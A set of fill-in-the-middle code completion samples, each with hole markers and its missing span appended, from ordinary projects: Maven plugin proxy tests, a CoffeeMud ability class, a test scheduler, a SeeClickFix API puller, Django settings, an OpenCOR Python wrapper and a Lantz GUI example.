) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.war'), 'w').close() run_mock.side_effect = side os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package']), ]) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_targets(self, run_mock): env_vars = ( ('http_proxy', None), ('https_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) opts = self.options opts.maven_targets = ['child1', 'child2'] plugin = maven.MavenPlugin('test-part', opts, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'child1', 'target')) os.makedirs(os.path.join(plugin.builddir, 'child2', 'target')) open(os.path.join(plugin.builddir, 'child1', 'target', 'child1.jar'), 'w').close() open(os.path.join(plugin.builddir, 'child2', 'target', 'child2.jar'), 'w').close() run_mock.side_effect = side os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package']), ]) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_http_proxy(self, run_mock): env_vars = ( ('http_proxy', 'http://localhost:3132'), ('https_proxy', None), ('no_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml') os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package', '-s', settings_path]), ]) self.assertTrue( os.path.exists(settings_path), 'expected {!r} to exist'.format(settings_path)) with open(settings_path) as f: settings_contents = f.read() expected_contents = ( '<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n' ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n' ' xsi:schemaLocation="http://maven.apache.org/SETTINGS/' '1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n' ' <interactiveMode>false</interactiveMode>\n' ' <proxies>\n' ' <proxy>\n' ' <id>http_proxy</id>\n' ' <active>true</active>\n' ' <protocol>http</protocol>\n' ' <host>localhost</host>\n' ' <port>3132</port>\n' ' <nonProxyHosts>localhost</nonProxyHosts>\n' ' </proxy>\n' ' </proxies>\n' '</settings>\n') self.assertSettingsEqual(expected_contents, settings_contents) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_http_proxy_and_no_proxy(self, run_mock): env_vars = ( ('http_proxy', 'http://localhost:3132'), ('https_proxy', None), ('no_proxy', 'internal'), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml') os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package', '-s', settings_path]), ]) self.assertTrue( os.path.exists(settings_path), 'expected {!r} to exist'.format(settings_path)) with open(settings_path) as f: settings_contents = f.read() expected_contents = ( '<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n' ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n' ' xsi:schemaLocation="http://maven.apache.org/SETTINGS/' '1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n' ' <interactiveMode>false</interactiveMode>\n' ' <proxies>\n' ' <proxy>\n' ' <id>http_proxy</id>\n' ' <active>true</active>\n' ' <protocol>http</protocol>\n' ' <host>localhost</host>\n' ' <port>3132</port>\n' ' <nonProxyHosts>internal</nonProxyHosts>\n' ' </proxy>\n' ' </proxies>\n' '</settings>\n') self.assertSettingsEqual(expected_contents, settings_contents) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_http_proxy_and_no_proxies(self, run_mock): env_vars = ( ('http_proxy', 'http://localhost:3132'), ('https_proxy', None), ('no_proxy', 'internal, pseudo-dmz'), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml') os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package', '-s', settings_path]), ]) self.assertTrue( os.path.exists(settings_path), 'expected {!r} to exist'.format(settings_path)) with open(settings_path) as f: settings_contents = f.read() expected_contents = ( '<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n' ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n' ' xsi:schemaLocation="http://maven.apache.org/SETTINGS/' '1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n' ' <interactiveMode>false</interactiveMode>\n' ' <proxies>\n' ' <proxy>\n' ' <id>http_proxy</id>\n' ' <active>true</active>\n' ' <protocol>http</protocol>\n' ' <host>localhost</host>\n' ' <port>3132</port>\n' ' <nonProxyHosts>internal|pseudo-dmz</nonProxyHosts>\n' ' </proxy>\n' ' </proxies>\n' '</settings>\n') self.assertSettingsEqual(expected_contents, settings_contents) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_http_and_https_proxy(self, run_mock): env_vars = ( ('http_proxy', 'http://localhost:3132'), ('https_proxy', 'http://localhost:3133'), ('no_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml') os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package', '-s', settings_path]), ]) self.assertTrue( os.path.exists(settings_path), 'expected {!r} to exist'.format(settings_path)) with open(settings_path) as f: settings_contents = f.read() expected_contents = ( '<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n' ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'<|fim▁hole|> ' <interactiveMode>false</interactiveMode>\n' ' <proxies>\n' ' <proxy>\n' ' <id>http_proxy</id>\n' ' <active>true</active>\n' ' <protocol>http</protocol>\n' ' <host>localhost</host>\n' ' <port>3132</port>\n' ' <nonProxyHosts>localhost</nonProxyHosts>\n' ' </proxy>\n' ' <proxy>\n' ' <id>https_proxy</id>\n' ' <active>true</active>\n' ' <protocol>https</protocol>\n' ' <host>localhost</host>\n' ' <port>3133</port>\n' ' <nonProxyHosts>localhost</nonProxyHosts>\n' ' </proxy>\n' ' </proxies>\n' '</settings>\n') self.assertSettingsEqual(expected_contents, settings_contents) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_with_authenticated_proxies(self, run_mock): env_vars = ( ('http_proxy', 'http://user1:pass1@localhost:3132'), ('https_proxy', 'http://user2:pass2@localhost:3133'), ('no_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml') os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package', '-s', settings_path]), ]) self.assertTrue( os.path.exists(settings_path), 'expected {!r} to exist'.format(settings_path)) with open(settings_path) as f: settings_contents = f.read() expected_contents = ( '<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n' ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n' ' xsi:schemaLocation="http://maven.apache.org/SETTINGS/' '1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n' ' <interactiveMode>false</interactiveMode>\n' ' <proxies>\n' ' <proxy>\n' ' <id>http_proxy</id>\n' ' <active>true</active>\n' ' <protocol>http</protocol>\n' ' <host>localhost</host>\n' ' <port>3132</port>\n' ' <username>user1</username>\n' ' <password>pass1</password>\n' ' <nonProxyHosts>localhost</nonProxyHosts>\n' ' </proxy>\n' ' <proxy>\n' ' <id>https_proxy</id>\n' ' <active>true</active>\n' ' <protocol>https</protocol>\n' ' <host>localhost</host>\n' ' <port>3133</port>\n' ' <username>user2</username>\n' ' <password>pass2</password>\n' ' <nonProxyHosts>localhost</nonProxyHosts>\n' ' </proxy>\n' ' </proxies>\n' '</settings>\n') self.assertSettingsEqual(expected_contents, settings_contents)<|fim▁end|>
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/' '1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
<|file_name|>Play_Organs.java<|end_file_name|><|fim▁begin|>package com.planet_ink.coffee_mud.Abilities.Songs; import com.planet_ink.coffee_mud.core.interfaces.*; import com.planet_ink.coffee_mud.core.*; import com.planet_ink.coffee_mud.core.collections.*; import com.planet_ink.coffee_mud.Abilities.interfaces.*; import com.planet_ink.coffee_mud.Areas.interfaces.*; import com.planet_ink.coffee_mud.Behaviors.interfaces.*; import com.planet_ink.coffee_mud.CharClasses.interfaces.*; import com.planet_ink.coffee_mud.Commands.interfaces.*; import com.planet_ink.coffee_mud.Common.interfaces.*; import com.planet_ink.coffee_mud.Exits.interfaces.*; import com.planet_ink.coffee_mud.Items.interfaces.*; import com.planet_ink.coffee_mud.Locales.interfaces.*; import com.planet_ink.coffee_mud.MOBS.interfaces.*; import com.planet_ink.coffee_mud.Races.interfaces.*; import java.util.*; /* Copyright 2000-2014 Bo Zimmerman Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ public class Play_Organs extends Play_Instrument { @Override public String ID() { return "Play_Organs"; } private final static String localizedName = CMLib.lang()._("Organs"); @Override public String name() { return localizedName; } @Override protected int requiredInstrumentType(){return MusicalInstrument.TYPE_ORGANS;} @Override public String mimicSpell(){return "Prayer_ProtectHealth";} @Override protected int canAffectCode(){return 0;}<|fim▁hole|> protected Ability getSpell() { if(theSpell!=null) return theSpell; if(mimicSpell().length()==0) return null; theSpell=CMClass.getAbility(mimicSpell()); return theSpell; } }<|fim▁end|>
private static Ability theSpell=null; @Override
<|file_name|>sft_handler.py<|end_file_name|><|fim▁begin|>""" Dealing with SFT tests. """ import logging import sft_meta import sft_schema as schema from sft.utils.helpers import strip_args class SFTPool(): """ This class defines all site functional tests (SFT)s that shall be executed. """ def __init__(self): self.log = logging.getLogger(__name__) self.session=sft_meta.Session() self.log.debug("Initialization finished") def __del__(self): self.session.close() @strip_args def add_sft(self, name, cluster_grp, vo_grp,test_suit): """ Adding a new SFT to the 'global' pool of SFTS. params: name - the name of the SFT, must be unique cluster_grp - the name of the cluster group (see ClusterGroupPool) to which SFTs shall apply vo_grp - the name of the VO group (see VOGroupPool), to which SFT shall apply test_suit - the suit of tests the SFT consists of Notice: the execution time, is must be set via the set_exectime method Notice: XXX checks whether cluster_grp, vo_grp and test_suit exist are currently missing """ sft = self.session.query(schema.SFTTest).filter_by(name=name).first() if sft: self.log.info("SFT test '%s' exists already, overwriting" % name) else: self.log.debug("Adding SFT '%s'." % name) sft = schema.SFTTest() sft.name = name sft.cluster_group = cluster_grp sft.vo_group = vo_grp sft.test_suit = test_suit self.session.add(sft) self.session.commit() @strip_args<|fim▁hole|> def set_exectime(self, name, minute='0', hour='*', day='*', month='*', weekday='*'): """ Setting execution time of the SFT. params: name - name of the SFT minute - minute 0-59, default 0 hour - hour 0-23, default * day - day 1-31, default * month - month 1-12, default * weekday - day of week 0-6, Sunday=0, default * Notice: for each param, you can use crontab notation, e.g. '*', '1-3', '*/5', etc. """ sft = self.session.query(schema.SFTTest).filter_by(name=name).first() if sft: sft.minute = minute sft.hour = hour sft.day = day sft.month= month sft.weekday = weekday self.session.commit() @strip_args def remove_sft(self, name): """ removing SFT from SFT pool. params: name - name of SFT to remove """ sft = self.session.query(schema.SFTTest).filter_by(name=name).first() if sft: self.log.info("Removing sft '%s'." % name) self.session.delete(sft) self.session.commit() def list_sfts(self): """ Listing of all existing SFTs in pool. returns list of SFT objects """ return self.session.query(schema.SFTTest).all()<|fim▁end|>
<|file_name|>seeclickfix_api.py<|end_file_name|><|fim▁begin|>''' Pull one page of 100 results from seeclickfix using the global PARAMS value if the parameters are not supplied. If there are more than 100 results, make another pull passing paramters that include the next page to be pulled. Nicole Donnelly 30May2016, updated 21Oct2016 ''' import requests import json def get_seeclickfix(page=1, pulled=0, search_params={'place_url': 'district-of-columbia', 'after': '2016-10-01', 'per_page': 100}): # base_url for usajobs api to build the request url base_url = 'https://seeclickfix.com/api/v2/issues' # send a get request with the url, parameters, and header myResponse = requests.get(url=base_url, params=search_params) # For successful API call, response code will be 200 (OK) if(myResponse.ok): # Loading the response data into a dict variable data = json.loads(myResponse.content.decode('utf-8')) # get the total search result count and set it to count_all. the # API only allows 100 results per page count_all = data['metadata']['pagination']['entries'] <|fim▁hole|> pulled = pulled + 100 # create a file name that reflects which page of results it contains # and write that file file_name = 'data%d.json' % page with open(file_name, 'w') as outfile: json.dump(data, outfile) # check to see if we pulled all the results. If not, increment the # page count, update the parameters dictionary to include the page # number, and run the process again. if pulled < count_all: page += 1 page_param = {'page': page} search_params.update(page_param) print(search_params) get_seeclickfix(page, pulled, search_params) else: # If response code is not ok (200), print the resulting http error # code with description myResponse.raise_for_status() if __name__ == '__main__': get_seeclickfix()<|fim▁end|>
# track the number of items we have pulled with our requests
<|file_name|>epio.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import from .base import * from bundle_config import config DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': config['postgres']['database'], 'USER': config['postgres']['username'], 'PASSWORD': config['postgres']['password'], 'HOST': config['postgres']['host'], } } <|fim▁hole|> host=config['redis']['host'], port=config['redis']['port']), 'OPTIONS': { 'PASSWORD': config['redis']['password'], }, 'VERSION': config['core']['version'], }, } DEBUG = False<|fim▁end|>
CACHES = { 'default': { 'BACKEND': 'redis_cache.RedisCache', 'LOCATION': '{host}:{port}'.format(
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>from m2core.m2core import M2Core, logger from m2core import bases from m2core import data_schemes from m2core import db<|fim▁hole|>from m2core import utils from m2core import common<|fim▁end|>
<|file_name|>private_import_core.d.ts<|end_file_name|><|fim▁begin|>/** * @license * Copyright Google Inc. All Rights Reserved. * * Use of this source code is governed by an MIT-style license that can be<|fim▁hole|>export declare type RenderDebugInfo = typeof r._RenderDebugInfo; export declare var RenderDebugInfo: typeof r.RenderDebugInfo; export declare type DirectRenderer = typeof r._DirectRenderer; export declare var ReflectionCapabilities: typeof r.ReflectionCapabilities; export declare type DebugDomRootRenderer = typeof r._DebugDomRootRenderer; export declare var DebugDomRootRenderer: typeof r.DebugDomRootRenderer; export declare var reflector: typeof r.reflector; export declare type NoOpAnimationPlayer = typeof r._NoOpAnimationPlayer; export declare var NoOpAnimationPlayer: typeof r.NoOpAnimationPlayer; export declare type AnimationPlayer = typeof r._AnimationPlayer; export declare var AnimationPlayer: typeof r.AnimationPlayer; export declare type AnimationSequencePlayer = typeof r._AnimationSequencePlayer; export declare var AnimationSequencePlayer: typeof r.AnimationSequencePlayer; export declare type AnimationGroupPlayer = typeof r._AnimationGroupPlayer; export declare var AnimationGroupPlayer: typeof r.AnimationGroupPlayer; export declare type AnimationKeyframe = typeof r._AnimationKeyframe; export declare var AnimationKeyframe: typeof r.AnimationKeyframe; export declare type AnimationStyles = typeof r._AnimationStyles; export declare var AnimationStyles: typeof r.AnimationStyles; export declare var prepareFinalAnimationStyles: typeof r.prepareFinalAnimationStyles; export declare var balanceAnimationKeyframes: typeof r.balanceAnimationKeyframes; export declare var clearStyles: typeof r.clearStyles; export declare var collectAndResolveStyles: typeof r.collectAndResolveStyles;<|fim▁end|>
* found in the LICENSE file at https://angular.io/license */ import { __core_private__ as r } from '@angular/core';
<|file_name|>start_basinhopping_worker.py<|end_file_name|><|fim▁begin|>from pele.concurrent import BasinhoppingWorker from start_server import create_system, get_server_uri def main(): system = create_system() uri = get_server_uri() worker = BasinhoppingWorker(uri, system=system) worker.run(1000) <|fim▁hole|><|fim▁end|>
if __name__ == "__main__": main()
<|file_name|>datastorepythonwrapper.cpp<|end_file_name|><|fim▁begin|>/******************************************************************************* Copyright (C) The University of Auckland OpenCOR is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. OpenCOR is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://gnu.org/licenses>. *******************************************************************************/ //============================================================================== // Data store Python wrapper //============================================================================== #include <Qt> //============================================================================== // Note: yes, these two header files must be included in this order... #include "datastorepythonwrapper.h" #include "datastorepythonnumpy.h" //============================================================================== #include "pythonqtsupport.h" //============================================================================== #include <array> //============================================================================== namespace OpenCOR { namespace DataStore { //============================================================================== static bool initNumPy() { // Initialise NumPy import_array1(false) return true; } //============================================================================== static DataStoreValue * getDataStoreValue(PyObject *pValuesDict, PyObject *pKey) { // Get and return a DataStoreValue item from a values dictionary PythonQtInstanceWrapper *wrappedObject = PythonQtSupport::getInstanceWrapper(PyDict_GetItem(pValuesDict, pKey)); if (wrappedObject != nullptr) { return static_cast<DataStoreValue *>(wrappedObject->_objPointerCopy); } return nullptr; } //============================================================================== static PyObject * DataStoreValuesDict_subscript(PyObject *pValuesDict, PyObject *pKey) { // Get and return a subscripted item from a values dictionary DataStoreValue *dataStoreValue = getDataStoreValue(pValuesDict, pKey); if (dataStoreValue != nullptr) { return PyFloat_FromDouble(dataStoreValue->value()); } #include "pythonbegin.h" Py_RETURN_NONE; #include "pythonend.h" } //============================================================================== using DataStoreValuesDictObject = struct { PyDictObject dict; SimulationSupport::SimulationDataUpdatedFunction *simulationDataUpdatedFunction; }; //============================================================================== static int DataStoreValuesDict_ass_subscript(PyObject *pValuesDict, PyObject *pKey, PyObject *pValue) { // Assign to a subscripted item in a values dictionary if (pValue == nullptr) { return PyDict_DelItem(pValuesDict, pKey); } if (PyNumber_Check(pValue) == 1) { DataStoreValue *dataStoreValue = getDataStoreValue(pValuesDict, pKey); if (dataStoreValue != nullptr) { #include "pythonbegin.h" auto newValue = PyFloat_AS_DOUBLE(PyNumber_Float(pValue)); // NOLINT(cppcoreguidelines-pro-type-cstyle-cast) #include "pythonend.h" if (!qFuzzyCompare(dataStoreValue->value(), newValue)) { dataStoreValue->setValue(newValue); // Let our SimulationData object know that simulation data values // have been updated<|fim▁hole|> if (simulationDataUpdatedFunction != nullptr) { (*simulationDataUpdatedFunction)(); } } return 0; } } PyErr_SetString(PyExc_TypeError, qPrintable(QObject::tr("invalid value."))); return -1; } //============================================================================== static PyMappingMethods DataStoreValuesDict_as_mapping = { nullptr, // mp_length static_cast<binaryfunc>(DataStoreValuesDict_subscript), // mp_subscript static_cast<objobjargproc>(DataStoreValuesDict_ass_subscript) // mp_ass_subscript }; //============================================================================== #include "pythonbegin.h" static PyObject * DataStoreValuesDict_repr(DataStoreValuesDictObject *pValuesDict) { // A string representation of a values dictionary // Note: this is a modified version of dict_repr() from dictobject.c in the // Python source code... auto mp = reinterpret_cast<PyDictObject *>(pValuesDict); Py_ssize_t i = Py_ReprEnter(reinterpret_cast<PyObject *>(mp)); PyObject *key = nullptr; PyObject *value = nullptr; bool first = true; if (i != 0) { return (i > 0)? PyUnicode_FromString("{...}"): nullptr; } if (mp->ma_used == 0) { Py_ReprLeave(reinterpret_cast<PyObject *>(mp)); return PyUnicode_FromString("{}"); } _PyUnicodeWriter writer; _PyUnicodeWriter_Init(&writer); writer.overallocate = 1; writer.min_length = 1+4+(2+4)*(mp->ma_used-1)+1; if (_PyUnicodeWriter_WriteChar(&writer, '{') < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } while (PyDict_Next(reinterpret_cast<PyObject *>(mp), &i, &key, &value) != 0) { PyObject *s; int res; Py_INCREF(key); Py_INCREF(value); if (!first) { if (_PyUnicodeWriter_WriteASCIIString(&writer, ", ", 2) < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } } first = false; s = PyObject_Repr(key); if (s == nullptr) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } res = _PyUnicodeWriter_WriteStr(&writer, s); Py_DECREF(s); if (res < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } if (_PyUnicodeWriter_WriteASCIIString(&writer, ": ", 2) < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } PythonQtInstanceWrapper *wrappedValue = PythonQtSupport::getInstanceWrapper(value); if (wrappedValue != nullptr) { auto dataStoreValue = static_cast<DataStoreValue *>(wrappedValue->_objPointerCopy); Py_CLEAR(value); value = PyFloat_FromDouble(dataStoreValue->value()); } s = PyObject_Repr(value); if (s == nullptr) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } res = _PyUnicodeWriter_WriteStr(&writer, s); Py_DECREF(s); if (res < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } Py_CLEAR(key); Py_CLEAR(value); } writer.overallocate = 0; if (_PyUnicodeWriter_WriteChar(&writer, '}') < 0) { goto error; // NOLINT(cppcoreguidelines-avoid-goto, hicpp-avoid-goto) } Py_ReprLeave((PyObject *)mp); // NOLINT(cppcoreguidelines-pro-type-cstyle-cast, google-readability-casting) return _PyUnicodeWriter_Finish(&writer); error: Py_ReprLeave((PyObject *)mp); // NOLINT(cppcoreguidelines-pro-type-cstyle-cast, google-readability-casting) _PyUnicodeWriter_Dealloc(&writer); Py_XDECREF(key); Py_XDECREF(value); return nullptr; } #include "pythonend.h" //============================================================================== // Note: a DataStoreValuesDict is a dictionary sub-class for mapping between the // values of a DataStoreValues list and Python... static PyTypeObject DataStoreValuesDict_Type = { PyVarObject_HEAD_INIT(&PyType_Type, 0) "OpenCOR.DataStoreValuesDict", // tp_name sizeof(DataStoreValuesDictObject), // tp_basicsize 0, // tp_itemsize nullptr, // tp_dealloc nullptr, // tp_print nullptr, // tp_getattr nullptr, // tp_setattr nullptr, // tp_compare reinterpret_cast<reprfunc>(DataStoreValuesDict_repr), // tp_repr nullptr, // tp_as_number nullptr, // tp_as_sequence &DataStoreValuesDict_as_mapping, // tp_as_mapping nullptr, // tp_hash nullptr, // tp_call nullptr, // tp_str nullptr, // tp_getattro nullptr, // tp_setattro nullptr, // tp_as_buffer Py_TPFLAGS_DEFAULT|Py_TPFLAGS_BASETYPE, // tp_flags nullptr, // tp_doc nullptr, // tp_traverse nullptr, // tp_clear nullptr, // tp_richcompare 0, // tp_weaklistoffset nullptr, // tp_iter nullptr, // tp_iternext nullptr, // tp_methods nullptr, // tp_members nullptr, // tp_getset &PyDict_Type, // tp_base nullptr, // tp_dict nullptr, // tp_descr_get nullptr, // tp_descr_set 0, // tp_dictoffset nullptr, // tp_init nullptr, // tp_alloc nullptr, // tp_new nullptr, // tp_free nullptr, // tp_is_gc nullptr, // tp_bases nullptr, // tp_mro nullptr, // tp_cache nullptr, // tp_subclasses nullptr, // tp_weaklist nullptr, // tp_del 0, // tp_version_tag nullptr, // tp_finalize }; //============================================================================== DataStorePythonWrapper::DataStorePythonWrapper(void *pModule, QObject *pParent) : QObject(pParent) { Q_UNUSED(pModule) // Initialise NumPy if (OpenCOR_Python_Wrapper_PyArray_API == nullptr) { #ifdef QT_DEBUG bool res = #endif initNumPy(); #ifdef QT_DEBUG if (!res) { qFatal("FATAL ERROR | %s:%d: unable to initialise NumPy.", __FILE__, __LINE__); } #endif } PyType_Ready(&DataStoreValuesDict_Type); // Register some OpenCOR classes with Python and add some decorators to // ourselves PythonQtSupport::registerClass(&DataStore::staticMetaObject); PythonQtSupport::registerClass(&DataStoreValue::staticMetaObject); PythonQtSupport::registerClass(&DataStoreVariable::staticMetaObject); PythonQtSupport::addInstanceDecorators(this); } //============================================================================== PyObject * DataStorePythonWrapper::dataStoreValuesDict(const DataStoreValues *pDataStoreValues, SimulationSupport::SimulationDataUpdatedFunction *pSimulationDataUpdatedFunction) { // Create and return a Python dictionary for the given data store values and // keep track of the given simulation data updated function so that we can // let OpenCOR know when simulation data have been updated PyObject *res = PyDict_Type.tp_new(&DataStoreValuesDict_Type, nullptr, nullptr); res->ob_type = &DataStoreValuesDict_Type; reinterpret_cast<DataStoreValuesDictObject *>(res)->simulationDataUpdatedFunction = pSimulationDataUpdatedFunction; if (pDataStoreValues != nullptr) { for (int i = 0, iMax = pDataStoreValues->size(); i < iMax; ++i) { DataStoreValue *value = pDataStoreValues->at(i); PythonQtSupport::addObject(res, value->uri(), value); } } return res; } //============================================================================== PyObject * DataStorePythonWrapper::dataStoreVariablesDict(const DataStoreVariables &pDataStoreVariables) { // Create and return a Python dictionary for the given data store variables PyObject *res = PyDict_New(); for (auto dataStoreVariable : pDataStoreVariables) { PythonQtSupport::addObject(res, dataStoreVariable->uri(), dataStoreVariable); } return res; } //============================================================================== PyObject * DataStorePythonWrapper::variables(DataStore *pDataStore) { // Return the variables in the given data store as a Python dictionary return dataStoreVariablesDict(pDataStore->variables()); } //============================================================================== PyObject * DataStorePythonWrapper::voi_and_variables(DataStore *pDataStore) { // Return the VOI and variables in the given data store as a Python // dictionary return dataStoreVariablesDict(pDataStore->voiAndVariables()); } //============================================================================== double DataStorePythonWrapper::value(DataStoreVariable *pDataStoreVariable, quint64 pPosition, int pRun) const { // Return the value of the given data store variable at the given position // and for the given run if ( (pDataStoreVariable != nullptr) && (pDataStoreVariable->array() != nullptr)) { return pDataStoreVariable->value(pPosition, pRun); } throw std::runtime_error(tr("The 'NoneType' object is not subscriptable.").toStdString()); } //============================================================================== PyObject * DataStorePythonWrapper::values(DataStoreVariable *pDataStoreVariable, int pRun) const { // Create and return a NumPy array for the given data store variable and run DataStoreArray *dataStoreArray = pDataStoreVariable->array(pRun); if ((pDataStoreVariable != nullptr) && (dataStoreArray != nullptr)) { auto numPyArray = new NumPyPythonWrapper(dataStoreArray, pDataStoreVariable->size()); return numPyArray->numPyArray(); } #include "pythonbegin.h" Py_RETURN_NONE; #include "pythonend.h" } //============================================================================== NumPyPythonWrapper::NumPyPythonWrapper(DataStoreArray *pDataStoreArray, quint64 pSize) : mArray(pDataStoreArray) { // Tell our array that we are holding it mArray->hold(); // Initialise ourselves std::array<npy_intp, 1> dims = { npy_intp((pSize > 0)?pSize:pDataStoreArray->size()) }; #include "pythonbegin.h" mNumPyArray = PyArray_SimpleNewFromData(1, dims.data(), NPY_DOUBLE, static_cast<void *>(mArray->data())); // NOLINT(cppcoreguidelines-pro-type-cstyle-cast) PyArray_SetBaseObject(reinterpret_cast<PyArrayObject *>(mNumPyArray), // NOLINT(cppcoreguidelines-pro-type-cstyle-cast) PythonQtSupport::wrapQObject(this)); #include "pythonend.h" } //============================================================================== NumPyPythonWrapper::~NumPyPythonWrapper() { // Tell our array that we are releasing it mArray->release(); } //============================================================================== PyObject * NumPyPythonWrapper::numPyArray() const { // Return our NumPy array return mNumPyArray; } //============================================================================== } // namespace DataStore } // namespace OpenCOR //============================================================================== // End of file //==============================================================================<|fim▁end|>
auto simulationDataUpdatedFunction = reinterpret_cast<DataStoreValuesDictObject *>(pValuesDict)->simulationDataUpdatedFunction;
<|file_name|>example1-simpleloop.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- """ example1-simpleloop ~~~~~~~~~~~~~~~~~~~ This example shows how to use the loop block backend and frontend. :copyright: 2015 by Lantz Authors, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ # From lantz, you import a helper function. from lantz.ui.app import start_gui_app # and the loop block and its user interface from lantz.ui.blocks import Loop, LoopUi # the drivers you need (In this case just simulated dummy drivers). from lantz.drivers.examples.dummydrivers import DummyOsci # Drivers are instantiated in the usual way. osci = DummyOsci('COM2') # You create a function that will be called by the loop # It requires three parameters # counter - the iteration number # iterations - total number of iterations # overrun - a boolean indicating if the time required for the operation # is longer than the interval. def measure(counter, iterations, overrun): print(counter, iterations, overrun) data = osci.measure() print(data) <|fim▁hole|> # and assign the function to the body of the loop app.body = measure # Finally you start the program start_gui_app(app, LoopUi) # This contains a very complete GUI for a loop you can easily create a customized version!<|fim▁end|>
# You instantiate the loop app = Loop()
